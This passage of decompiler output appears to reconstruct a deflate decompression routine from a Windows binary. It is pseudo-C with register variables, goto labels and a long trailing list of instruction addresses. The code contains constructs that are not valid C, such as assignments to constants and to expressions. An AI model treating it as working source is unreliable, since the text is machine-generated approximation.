                                                                                              												goto L172;
                                                                                              											} else {
                                                                                              												goto L163;
                                                                                              											}
                                                                                              										case 7:
                                                                                              											L173:
                                                                                              											__eflags = __ebx - 7;
                                                                                              											if(__ebx > 7) {
                                                                                              												__ebx = __ebx - 8;
                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) + 1;
                                                                                              												_t380 = __ebp - 0x38;
                                                                                              												 *_t380 =  *(__ebp - 0x38) - 1;
                                                                                              												__eflags =  *_t380;
                                                                                              											}
                                                                                              											goto L175;
                                                                                              										case 8:
                                                                                              											L4:
                                                                                              											while(_t425 < 3) {
                                                                                              												if( *(_t448 - 0x34) == 0) {
                                                                                              													goto L182;
                                                                                              												} else {
                                                                                              													 *(_t448 - 0x34) =  *(_t448 - 0x34) - 1;
                                                                                              													 *(_t448 - 0x40) =  *(_t448 - 0x40) | ( *( *(_t448 - 0x38)) & 0x000000ff) << _t425;
                                                                                              													 *(_t448 - 0x38) =  &(( *(_t448 - 0x38))[1]);
                                                                                              													_t425 = _t425 + 8;
                                                                                              													continue;
                                                                                              												}
                                                                                              											}
                                                                                              											_t425 = _t425 - 3;
                                                                                              											 *(_t448 - 0x40) =  *(_t448 - 0x40) >> 3;
                                                                                              											_t406 =  *(_t448 - 0x40) & 0x00000007;
                                                                                              											asm("sbb ecx, ecx");
                                                                                              											_t408 = _t406 >> 1;
                                                                                              											_t446[0x145] = ( ~(_t406 & 0x00000001) & 0x00000007) + 8;
                                                                                              											if(_t408 == 0) {
                                                                                              												L24:
                                                                                              												 *_t446 = 9;
                                                                                              												_t436 = _t425 & 0x00000007;
                                                                                              												 *(_t448 - 0x40) =  *(_t448 - 0x40) >> _t436;
                                                                                              												_t425 = _t425 - _t436;
                                                                                              												goto L180;
                                                                                              											}
                                                                                              											L6:
                                                                                              											_t411 = _t408 - 1;
                                                                                              											if(_t411 == 0) {
                                                                                              												L13:
                                                                                              												__eflags =  *0x42daf0;
                                                                                              												if( *0x42daf0 != 0) {
                                                                                              													L22:
                                                                                              													_t412 =  *0x409364; // 0x9
                                                                                              													_t446[4] = _t412;
                                                                                              													_t413 =  *0x409368; // 0x5
                                                                                              													_t446[4] = _t413;
                                                                                              													_t414 =  *0x42c96c; // 0x0
                                                                                              													_t446[5] = _t414;
                                                                                              													_t415 =  *0x42c968; // 0x0
                                                                                              													_t446[6] = _t415;
                                                                                              													L23:
                                                                                              													 *_t446 =  *_t446 & 0x00000000;
                                                                                              													goto L180;
                                                                                              												} else {
                                                                                              													_t26 = _t448 - 8;
                                                                                              													 *_t26 =  *(_t448 - 8) & 0x00000000;
                                                                                              													__eflags =  *_t26;
                                                                                              													_t416 = 0x42c970;
                                                                                              													goto L15;
                                                                                              													L20:
                                                                                              													 *_t416 = _t438;
                                                                                              													_t416 = _t416 + 4;
                                                                                              													__eflags = _t416 - 0x42cdf0;
                                                                                              													if(_t416 < 0x42cdf0) {
                                                                                              														L15:
                                                                                              														__eflags = _t416 - 0x42cbac;
                                                                                              														_t438 = 8;
                                                                                              														if(_t416 > 0x42cbac) {
                                                                                              															__eflags = _t416 - 0x42cd70;
                                                                                              															if(_t416 >= 0x42cd70) {
                                                                                              																__eflags = _t416 - 0x42cdd0;
                                                                                              																if(_t416 < 0x42cdd0) {
                                                                                              																	_t438 = 7;
                                                                                              																}
                                                                                              															} else {
                                                                                              																_t438 = 9;
                                                                                              															}
                                                                                              														}
                                                                                              														goto L20;
                                                                                              													} else {
                                                                                              														E0040681A(0x42c970, 0x120, 0x101, 0x407388, 0x4073c8, 0x42c96c, 0x409364, 0x42d270, _t448 - 8);
                                                                                              														_push(0x1e);
                                                                                              														_pop(_t440);
                                                                                              														_push(5);
                                                                                              														_pop(_t419);
                                                                                              														memset(0x42c970, _t419, _t440 << 2);
                                                                                              														_t450 = _t450 + 0xc;
                                                                                              														_t442 = 0x42c970 + _t440;
                                                                                              														E0040681A(0x42c970, 0x1e, 0, 0x407408, 0x407444, 0x42c968, 0x409368, 0x42d270, _t448 - 8);
                                                                                              														 *0x42daf0 =  *0x42daf0 + 1;
                                                                                              														__eflags =  *0x42daf0;
                                                                                              														goto L22;
                                                                                              													}
                                                                                              												}
                                                                                              											}
                                                                                              											L7:
                                                                                              											_t423 = _t411 - 1;
                                                                                              											if(_t423 == 0) {
                                                                                              												 *_t446 = 0xb;
                                                                                              												goto L180;
                                                                                              											}
                                                                                              											L8:
                                                                                              											if(_t423 != 1) {
                                                                                              												goto L180;
                                                                                              											}
                                                                                              											goto L9;
                                                                                              										case 9:
                                                                                              											while(1) {
                                                                                              												L27:
                                                                                              												__eflags = __ebx - 0x10;
                                                                                              												if(__ebx >= 0x10) {
                                                                                              													break;
                                                                                              												}
                                                                                              												L25:
                                                                                              												__eflags =  *(__ebp - 0x34);
                                                                                              												if( *(__ebp - 0x34) == 0) {
                                                                                              													goto L182;
                                                                                              												}
                                                                                              												L26:
                                                                                              												__eax =  *(__ebp - 0x38);
                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                              												__ecx = __ebx;
                                                                                              												 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                              												__ebx = __ebx + 8;
                                                                                              												__eflags = __ebx;
                                                                                              											}
                                                                                              											L28:
                                                                                              											__eax =  *(__ebp - 0x40);
                                                                                              											__ebx = 0;
                                                                                              											__eax =  *(__ebp - 0x40) & 0x0000ffff;
                                                                                              											 *(__ebp - 0x40) = 0;
                                                                                              											__eflags = __eax;
                                                                                              											__esi[1] = __eax;
                                                                                              											if(__eax == 0) {
                                                                                              												goto L53;
                                                                                              											}
                                                                                              											L29:
                                                                                              											_push(0xa);
                                                                                              											_pop(__eax);
                                                                                              											goto L54;
                                                                                              										case 0xa:
                                                                                              											L30:
                                                                                              											__eflags =  *(__ebp - 0x34);
                                                                                              											if( *(__ebp - 0x34) == 0) {
                                                                                              												goto L182;
                                                                                              											}
                                                                                              											L31:
                                                                                              											__eax =  *(__ebp - 0x2c);
                                                                                              											__eflags = __eax;
                                                                                              											if(__eax != 0) {
                                                                                              												L48:
                                                                                              												__eflags = __eax -  *(__ebp - 0x34);
                                                                                              												if(__eax >=  *(__ebp - 0x34)) {
                                                                                              													__eax =  *(__ebp - 0x34);
                                                                                              												}
                                                                                              												__ecx = __esi[1];
                                                                                              												__eflags = __ecx - __eax;
                                                                                              												__edi = __ecx;
                                                                                              												if(__ecx >= __eax) {
                                                                                              													__edi = __eax;
                                                                                              												}
                                                                                              												__eax = E004055C3( *(__ebp - 0x30),  *(__ebp - 0x38), __edi);
                                                                                              												 *(__ebp - 0x38) =  *(__ebp - 0x38) + __edi;
                                                                                              												 *(__ebp - 0x34) =  *(__ebp - 0x34) - __edi;
                                                                                              												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __edi;
                                                                                              												 *(__ebp - 0x2c) =  *(__ebp - 0x2c) - __edi;
                                                                                              												_t80 =  &(__esi[1]);
                                                                                              												 *_t80 = __esi[1] - __edi;
                                                                                              												__eflags =  *_t80;
                                                                                              												if( *_t80 == 0) {
                                                                                              													L53:
                                                                                              													__eax = __esi[0x145];
                                                                                              													L54:
                                                                                              													 *__esi = __eax;
                                                                                              												}
                                                                                              												goto L180;
                                                                                              											}
                                                                                              											L32:
                                                                                              											__ecx = __esi[0x26e8];
                                                                                              											__edx =  *(__ebp - 0x30);
                                                                                              											__eflags = __edx - __ecx;
                                                                                              											if(__edx != __ecx) {
                                                                                              												L38:
                                                                                              												__esi[0x26ea] = __edx;
                                                                                              												__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                                                              												__edx = __esi[0x26ea];
                                                                                              												__ecx = __esi[0x26e9];
                                                                                              												__eflags = __edx - __ecx;
                                                                                              												 *(__ebp - 0x30) = __edx;
                                                                                              												if(__edx >= __ecx) {
                                                                                              													__eax = __esi[0x26e8];
                                                                                              													__eax = __esi[0x26e8] - __edx;
                                                                                              													__eflags = __eax;
                                                                                              												} else {
                                                                                              													__ecx = __ecx - __edx;
                                                                                              													__eax = __ecx - __edx - 1;
                                                                                              												}
                                                                                              												__edi = __esi[0x26e8];
                                                                                              												 *(__ebp - 0x2c) = __eax;
                                                                                              												__eflags = __edx - __edi;
                                                                                              												if(__edx == __edi) {
                                                                                              													__edx =  &(__esi[0x6e8]);
                                                                                              													__eflags = __edx - __ecx;
                                                                                              													if(__eflags != 0) {
                                                                                              														 *(__ebp - 0x30) = __edx;
                                                                                              														if(__eflags >= 0) {
                                                                                              															__edi = __edi - __edx;
                                                                                              															__eflags = __edi;
                                                                                              															__eax = __edi;
                                                                                              														} else {
                                                                                              															__ecx = __ecx - __edx;
                                                                                              															__eax = __ecx;
                                                                                              														}
                                                                                              														 *(__ebp - 0x2c) = __eax;
                                                                                              													}
                                                                                              												}
                                                                                              												__eflags = __eax;
                                                                                              												if(__eax == 0) {
                                                                                              													goto L183;
                                                                                              												} else {
                                                                                              													goto L48;
                                                                                              												}
                                                                                              											}
                                                                                              											L33:
                                                                                              											__eax = __esi[0x26e9];
                                                                                              											__edi =  &(__esi[0x6e8]);
                                                                                              											__eflags = __eax - __edi;
                                                                                              											if(__eax == __edi) {
                                                                                              												goto L38;
                                                                                              											}
                                                                                              											L34:
                                                                                              											__edx = __edi;
                                                                                              											__eflags = __edx - __eax;
                                                                                              											 *(__ebp - 0x30) = __edx;
                                                                                              											if(__edx >= __eax) {
                                                                                              												__ecx = __ecx - __edx;
                                                                                              												__eflags = __ecx;
                                                                                              												__eax = __ecx;
                                                                                              											} else {
                                                                                              												__eax = __eax - __edx;
                                                                                              												__eax = __eax - 1;
                                                                                              											}
                                                                                              											__eflags = __eax;
                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                              											if(__eax != 0) {
                                                                                              												goto L48;
                                                                                              											} else {
                                                                                              												goto L38;
                                                                                              											}
                                                                                              										case 0xb:
                                                                                              											goto L56;
                                                                                              										case 0xc:
                                                                                              											L60:
                                                                                              											__esi[1] = __esi[1] >> 0xa;
                                                                                              											__eax = (__esi[1] >> 0xa) + 4;
                                                                                              											if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                                                              												goto L68;
                                                                                              											}
                                                                                              											goto L61;
                                                                                              										case 0xd:
                                                                                              											while(1) {
                                                                                              												L93:
                                                                                              												__eax = __esi[1];
                                                                                              												__ecx = __esi[2];
                                                                                              												__edx = __eax;
                                                                                              												__eax = __eax & 0x0000001f;
                                                                                              												__edx = __edx >> 5;
                                                                                              												__eax = __edx + __eax + 0x102;
                                                                                              												__eflags = __esi[2] - __eax;
                                                                                              												if(__esi[2] >= __eax) {
                                                                                              													break;
                                                                                              												}
                                                                                              												L73:
                                                                                              												__eax = __esi[0x143];
                                                                                              												while(1) {
                                                                                              													L76:
                                                                                              													__eflags = __ebx - __eax;
                                                                                              													if(__ebx >= __eax) {
                                                                                              														break;
                                                                                              													}
                                                                                              													L74:
                                                                                              													__eflags =  *(__ebp - 0x34);
                                                                                              													if( *(__ebp - 0x34) == 0) {
                                                                                              														goto L182;
                                                                                              													}
                                                                                              													L75:
                                                                                              													__ecx =  *(__ebp - 0x38);
                                                                                              													 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                              													__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                              													__ecx = __ebx;
                                                                                              													__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              													 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                              													__ebx = __ebx + 8;
                                                                                              													__eflags = __ebx;
                                                                                              												}
                                                                                              												L77:
                                                                                              												__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
                                                                                              												__eax = __eax &  *(__ebp - 0x40);
                                                                                              												__ecx = __esi[0x144];
                                                                                              												__eax = __esi[0x144] + __eax * 4;
                                                                                              												__edx =  *(__eax + 1) & 0x000000ff;
                                                                                              												__eax =  *(__eax + 2) & 0x0000ffff;
                                                                                              												__eflags = __eax - 0x10;
                                                                                              												 *(__ebp - 0x14) = __eax;
                                                                                              												if(__eax >= 0x10) {
                                                                                              													L79:
                                                                                              													__eflags = __eax - 0x12;
                                                                                              													if(__eax != 0x12) {
                                                                                              														__eax = __eax + 0xfffffff2;
                                                                                              														 *(__ebp - 8) = 3;
                                                                                              													} else {
                                                                                              														_push(7);
                                                                                              														 *(__ebp - 8) = 0xb;
                                                                                              														_pop(__eax);
                                                                                              													}
                                                                                              													while(1) {
                                                                                              														L84:
                                                                                              														__ecx = __eax + __edx;
                                                                                              														__eflags = __ebx - __eax + __edx;
                                                                                              														if(__ebx >= __eax + __edx) {
                                                                                              															break;
                                                                                              														}
                                                                                              														L82:
                                                                                              														__eflags =  *(__ebp - 0x34);
                                                                                              														if( *(__ebp - 0x34) == 0) {
                                                                                              															goto L182;
                                                                                              														}
                                                                                              														L83:
                                                                                              														__ecx =  *(__ebp - 0x38);
                                                                                              														 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                                                              														__edi =  *( *(__ebp - 0x38)) & 0x000000ff;
                                                                                              														__ecx = __ebx;
                                                                                              														__edi = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              														 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                                                              														 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                                                              														__ebx = __ebx + 8;
                                                                                              														__eflags = __ebx;
                                                                                              													}
                                                                                              													L85:
                                                                                              													__ecx = __edx;
                                                                                              													__ebx = __ebx - __edx;
                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                              													 *(0x409340 + __eax * 2) & 0x0000ffff =  *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
                                                                                              													__edx =  *(__ebp - 8);
                                                                                              													__ebx = __ebx - __eax;
                                                                                              													__edx =  *(__ebp - 8) + ( *(0x409340 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
                                                                                              													__ecx = __eax;
                                                                                              													__eax = __esi[1];
                                                                                              													 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                              													__ecx = __esi[2];
                                                                                              													__eax = __eax >> 5;
                                                                                              													__edi = __eax >> 0x00000005 & 0x0000001f;
                                                                                              													__eax = __eax & 0x0000001f;
                                                                                              													__eax = __edi + __eax + 0x102;
                                                                                              													__edi = __edx + __ecx;
                                                                                              													__eflags = __edx + __ecx - __eax;
                                                                                              													if(__edx + __ecx > __eax) {
                                                                                              														goto L9;
                                                                                              													}
                                                                                              													L86:
                                                                                              													__eflags =  *(__ebp - 0x14) - 0x10;
                                                                                              													if( *(__ebp - 0x14) != 0x10) {
                                                                                              														L89:
                                                                                              														__edi = 0;
                                                                                              														__eflags = 0;
                                                                                              														L90:
                                                                                              														__eax = __esi + 0xc + __ecx * 4;
                                                                                              														do {
                                                                                              															L91:
                                                                                              															 *__eax = __edi;
                                                                                              															__ecx = __ecx + 1;
                                                                                              															__eax = __eax + 4;
                                                                                              															__edx = __edx - 1;
                                                                                              															__eflags = __edx;
                                                                                              														} while (__edx != 0);
                                                                                              														__esi[2] = __ecx;
                                                                                              														continue;
                                                                                              													}
                                                                                              													L87:
                                                                                              													__eflags = __ecx - 1;
                                                                                              													if(__ecx < 1) {
                                                                                              														goto L9;
                                                                                              													}
                                                                                              													L88:
                                                                                              													__edi =  *(__esi + 8 + __ecx * 4);
                                                                                              													goto L90;
                                                                                              												}
                                                                                              												L78:
                                                                                              												__ecx = __edx;
                                                                                              												__ebx = __ebx - __edx;
                                                                                              												 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
                                                                                              												__ecx = __esi[2];
                                                                                              												 *(__esi + 0xc + __esi[2] * 4) = __eax;
                                                                                              												__esi[2] = __esi[2] + 1;
                                                                                              											}
                                                                                              											L94:
                                                                                              											__eax = __esi[1];
                                                                                              											__esi[0x144] = __esi[0x144] & 0x00000000;
                                                                                              											 *(__ebp - 0xc) =  *(__ebp - 0xc) & 0x00000000;
                                                                                              											__edi = __eax;
                                                                                              											__eax = __eax >> 5;
                                                                                              											__edi = __edi & 0x0000001f;
                                                                                              											__ecx = 0x101;
                                                                                              											__eax = __eax & 0x0000001f;
                                                                                              											__edi = __edi + 0x101;
                                                                                              											__eax = __eax + 1;
                                                                                              											__edx = __ebp - 0xc;
                                                                                              											 *(__ebp - 0x14) = __eax;
                                                                                              											 &(__esi[0x148]) = __ebp - 4;
                                                                                              											 *(__ebp - 4) = 9;
                                                                                              											__ebp - 0x18 =  &(__esi[3]);
                                                                                              											 *(__ebp - 0x10) = 6;
                                                                                              											__eax = E0040681A( &(__esi[3]), __edi, 0x101, 0x407388, 0x4073c8, __ebp - 0x18, __ebp - 4,  &(__esi[0x148]), __ebp - 0xc);
                                                                                              											__eflags =  *(__ebp - 4);
                                                                                              											if( *(__ebp - 4) == 0) {
                                                                                              												__eax = __eax | 0xffffffff;
                                                                                              												__eflags = __eax;
                                                                                              											}
                                                                                              											__eflags = __eax;
                                                                                              											if(__eax != 0) {
                                                                                              												goto L9;
                                                                                              											} else {
                                                                                              												L97:
                                                                                              												__ebp - 0xc =  &(__esi[0x148]);
                                                                                              												__ebp - 0x10 = __ebp - 0x1c;
                                                                                              												__eax = __esi + 0xc + __edi * 4;
                                                                                              												__eax = E0040681A(__esi + 0xc + __edi * 4,  *(__ebp - 0x14), 0, 0x407408, 0x407444, __ebp - 0x1c, __ebp - 0x10,  &(__esi[0x148]), __ebp - 0xc);
                                                                                              												__eflags = __eax;
                                                                                              												if(__eax != 0) {
                                                                                              													goto L9;
                                                                                              												}
                                                                                              												L98:
                                                                                              												__eax =  *(__ebp - 0x10);
                                                                                              												__eflags =  *(__ebp - 0x10);
                                                                                              												if( *(__ebp - 0x10) != 0) {
                                                                                              													L100:
                                                                                              													__cl =  *(__ebp - 4);
                                                                                              													 *__esi =  *__esi & 0x00000000;
                                                                                              													__eflags =  *__esi;
                                                                                              													__esi[4] = __al;
                                                                                              													__eax =  *(__ebp - 0x18);
                                                                                              													__esi[5] =  *(__ebp - 0x18);
                                                                                              													__eax =  *(__ebp - 0x1c);
                                                                                              													__esi[4] = __cl;
                                                                                              													__esi[6] =  *(__ebp - 0x1c);
                                                                                              													goto L101;
                                                                                              												}
                                                                                              												L99:
                                                                                              												__eflags = __edi - 0x101;
                                                                                              												if(__edi > 0x101) {
                                                                                              													goto L9;
                                                                                              												}
                                                                                              												goto L100;
                                                                                              											}
                                                                                              										case 0xe:
                                                                                              											goto L9;
                                                                                              										case 0xf:
                                                                                              											L175:
                                                                                              											__eax =  *(__ebp - 0x30);
                                                                                              											__esi[0x26ea] =  *(__ebp - 0x30);
                                                                                              											__eax = E004067B2( *((intOrPtr*)(__ebp + 8)));
                                                                                              											__ecx = __esi[0x26ea];
                                                                                              											__edx = __esi[0x26e9];
                                                                                              											__eflags = __ecx - __edx;
                                                                                              											 *(__ebp - 0x30) = __ecx;
                                                                                              											if(__ecx >= __edx) {
                                                                                              												__eax = __esi[0x26e8];
                                                                                              												__eax = __esi[0x26e8] - __ecx;
                                                                                              												__eflags = __eax;
                                                                                              											} else {
                                                                                              												__edx = __edx - __ecx;
                                                                                              												__eax = __edx - __ecx - 1;
                                                                                              											}
                                                                                              											__eflags = __ecx - __edx;
                                                                                              											 *(__ebp - 0x2c) = __eax;
                                                                                              											if(__ecx != __edx) {
                                                                                              												L183:
                                                                                              												__edi = 0;
                                                                                              												goto L10;
                                                                                              											} else {
                                                                                              												L179:
                                                                                              												__eax = __esi[0x145];
                                                                                              												__eflags = __eax - 8;
                                                                                              												 *__esi = __eax;
                                                                                              												if(__eax != 8) {
                                                                                              													L184:
                                                                                              													0 = 1;
                                                                                              													goto L10;
                                                                                              												}
                                                                                              												goto L180;
                                                                                              											}
                                                                                              									}
                                                                                              								}
                                                                                              								L181:
                                                                                              								goto L9;
                                                                                              							}
                                                                                              							L70:
                                                                                              							if( *__edi == __eax) {
                                                                                              								goto L72;
                                                                                              							}
                                                                                              							L71:
                                                                                              							__esi[2] = __esi[2] & __eax;
                                                                                              							 *__esi = 0xd;
                                                                                              							goto L93;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              				L182:
                                                                                              				_t443 = 0;
                                                                                              				_t446[0x147] =  *(_t448 - 0x40);
                                                                                              				_t446[0x146] = _t425;
                                                                                              				( *(_t448 + 8))[1] = 0;
                                                                                              				goto L11;
                                                                                              			}









                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406382
                                                                                              0x00406382
                                                                                              0x004063a7
                                                                                              0x004063a7
                                                                                              0x004063a7
                                                                                              0x004063a9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406387
                                                                                              0x00406387
                                                                                              0x0040638b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406391
                                                                                              0x00406391
                                                                                              0x00406394
                                                                                              0x00406397
                                                                                              0x0040639a
                                                                                              0x0040639c
                                                                                              0x0040639e
                                                                                              0x004063a1
                                                                                              0x004063a4
                                                                                              0x004063a4
                                                                                              0x004063a4
                                                                                              0x004063ab
                                                                                              0x004063ab
                                                                                              0x004063b3
                                                                                              0x004063b6
                                                                                              0x004063b9
                                                                                              0x004063bc
                                                                                              0x004063c0
                                                                                              0x004063c3
                                                                                              0x004063c5
                                                                                              0x004063c8
                                                                                              0x004063ca
                                                                                              0x004063de
                                                                                              0x004063de
                                                                                              0x004063e1
                                                                                              0x004063fb
                                                                                              0x004063fb
                                                                                              0x004063fe
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406404
                                                                                              0x00406404
                                                                                              0x00406407
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040640d
                                                                                              0x0040640d
                                                                                              0x00000000
                                                                                              0x0040640d
                                                                                              0x004063e3
                                                                                              0x004063e6
                                                                                              0x004063ed
                                                                                              0x004063f0
                                                                                              0x00000000
                                                                                              0x004063f0
                                                                                              0x004063cc
                                                                                              0x004063d0
                                                                                              0x004063d3
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406418
                                                                                              0x00406418
                                                                                              0x0040643d
                                                                                              0x0040643d
                                                                                              0x0040643d
                                                                                              0x0040643f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040641d
                                                                                              0x0040641d
                                                                                              0x00406421
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406427
                                                                                              0x00406427
                                                                                              0x0040642a
                                                                                              0x0040642d
                                                                                              0x00406430
                                                                                              0x00406432
                                                                                              0x00406434
                                                                                              0x00406437
                                                                                              0x0040643a
                                                                                              0x0040643a
                                                                                              0x0040643a
                                                                                              0x00406441
                                                                                              0x00406449
                                                                                              0x0040644c
                                                                                              0x0040644f
                                                                                              0x00406451
                                                                                              0x00406454
                                                                                              0x00406454
                                                                                              0x00406456
                                                                                              0x0040645a
                                                                                              0x0040645d
                                                                                              0x00406460
                                                                                              0x00406463
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406469
                                                                                              0x00406469
                                                                                              0x0040648e
                                                                                              0x0040648e
                                                                                              0x0040648e
                                                                                              0x00406490
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040646e
                                                                                              0x0040646e
                                                                                              0x00406472
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406478
                                                                                              0x00406478
                                                                                              0x0040647b
                                                                                              0x0040647e
                                                                                              0x00406481
                                                                                              0x00406483
                                                                                              0x00406485
                                                                                              0x00406488
                                                                                              0x0040648b
                                                                                              0x0040648b
                                                                                              0x0040648b
                                                                                              0x00406492
                                                                                              0x00406492
                                                                                              0x0040649a
                                                                                              0x0040649d
                                                                                              0x004064a0
                                                                                              0x004064a3
                                                                                              0x004064a7
                                                                                              0x004064aa
                                                                                              0x004064ac
                                                                                              0x004064af
                                                                                              0x004064b2
                                                                                              0x004064cc
                                                                                              0x004064cc
                                                                                              0x004064cf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004064d5
                                                                                              0x004064d5
                                                                                              0x004064d8
                                                                                              0x004064df
                                                                                              0x00000000
                                                                                              0x004064df
                                                                                              0x004064b4
                                                                                              0x004064b7
                                                                                              0x004064be
                                                                                              0x004064c1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004064e7
                                                                                              0x004064e7
                                                                                              0x0040650c
                                                                                              0x0040650c
                                                                                              0x0040650c
                                                                                              0x0040650e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004064ec
                                                                                              0x004064ec
                                                                                              0x004064f0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004064f6
                                                                                              0x004064f6
                                                                                              0x004064f9
                                                                                              0x004064fc
                                                                                              0x004064ff
                                                                                              0x00406501
                                                                                              0x00406503
                                                                                              0x00406506
                                                                                              0x00406509
                                                                                              0x00406509
                                                                                              0x00406509
                                                                                              0x00406510
                                                                                              0x00406518
                                                                                              0x0040651b
                                                                                              0x0040651e
                                                                                              0x00406520
                                                                                              0x00406523
                                                                                              0x00406523
                                                                                              0x00406525
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040652b
                                                                                              0x0040652b
                                                                                              0x0040652e
                                                                                              0x00406533
                                                                                              0x00406535
                                                                                              0x0040653b
                                                                                              0x0040653d
                                                                                              0x00406552
                                                                                              0x00406554
                                                                                              0x00406554
                                                                                              0x0040653f
                                                                                              0x00406545
                                                                                              0x00406547
                                                                                              0x00406549
                                                                                              0x00406549
                                                                                              0x00406556
                                                                                              0x0040655a
                                                                                              0x0040655d
                                                                                              0x00406563
                                                                                              0x00406563
                                                                                              0x00406566
                                                                                              0x00406566
                                                                                              0x00406566
                                                                                              0x00406568
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040656e
                                                                                              0x0040656e
                                                                                              0x00406574
                                                                                              0x00406576
                                                                                              0x0040659b
                                                                                              0x0040659e
                                                                                              0x004065a4
                                                                                              0x004065a9
                                                                                              0x004065af
                                                                                              0x004065b5
                                                                                              0x004065b7
                                                                                              0x004065ba
                                                                                              0x004065c3
                                                                                              0x004065c9
                                                                                              0x004065c9
                                                                                              0x004065bc
                                                                                              0x004065be
                                                                                              0x004065c0
                                                                                              0x004065c0
                                                                                              0x004065cb
                                                                                              0x004065d1
                                                                                              0x004065d3
                                                                                              0x004065d6
                                                                                              0x004065d8
                                                                                              0x004065de
                                                                                              0x004065e0
                                                                                              0x004065e2
                                                                                              0x004065e4
                                                                                              0x004065e6
                                                                                              0x004065e9
                                                                                              0x004065f2
                                                                                              0x004065f5
                                                                                              0x004065f5
                                                                                              0x004065eb
                                                                                              0x004065eb
                                                                                              0x004065ee
                                                                                              0x004065ee
                                                                                              0x004065e9
                                                                                              0x004065e0
                                                                                              0x004065f7
                                                                                              0x004065f9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004065f9
                                                                                              0x00406578
                                                                                              0x00406578
                                                                                              0x0040657e
                                                                                              0x00406584
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405ffc
                                                                                              0x00405f77
                                                                                              0x00405f77
                                                                                              0x00405f7d
                                                                                              0x00405f83
                                                                                              0x00405f85
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00405f87
                                                                                              0x00405f87
                                                                                              0x00405f89
                                                                                              0x00405f8b
                                                                                              0x00405f8e
                                                                                              0x00405f95
                                                                                              0x00405f95
                                                                                              0x00405f97
                                                                                              0x00405f90
                                                                                              0x00405f90
                                                                                              0x00405f92
                                                                                              0x00405f92
                                                                                              0x00405f99
                                                                                              0x00405f9b
                                                                                              0x00405f9e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004060a2
                                                                                              0x004060a5
                                                                                              0x004060a8
                                                                                              0x004060ae
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406285
                                                                                              0x00406285
                                                                                              0x00406285
                                                                                              0x00406288
                                                                                              0x0040628b
                                                                                              0x0040628d
                                                                                              0x00406290
                                                                                              0x00406296
                                                                                              0x0040629d
                                                                                              0x0040629f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406173
                                                                                              0x00406173
                                                                                              0x0040619b
                                                                                              0x0040619b
                                                                                              0x0040619b
                                                                                              0x0040619d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040617b
                                                                                              0x0040617b
                                                                                              0x0040617f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406185
                                                                                              0x00406185
                                                                                              0x00406188
                                                                                              0x0040618b
                                                                                              0x0040618e
                                                                                              0x00406190
                                                                                              0x00406192
                                                                                              0x00406195
                                                                                              0x00406198
                                                                                              0x00406198
                                                                                              0x00406198
                                                                                              0x0040619f
                                                                                              0x0040619f
                                                                                              0x004061a7
                                                                                              0x004061aa
                                                                                              0x004061b0
                                                                                              0x004061b3
                                                                                              0x004061b7
                                                                                              0x004061bb
                                                                                              0x004061be
                                                                                              0x004061c1
                                                                                              0x004061d9
                                                                                              0x004061d9
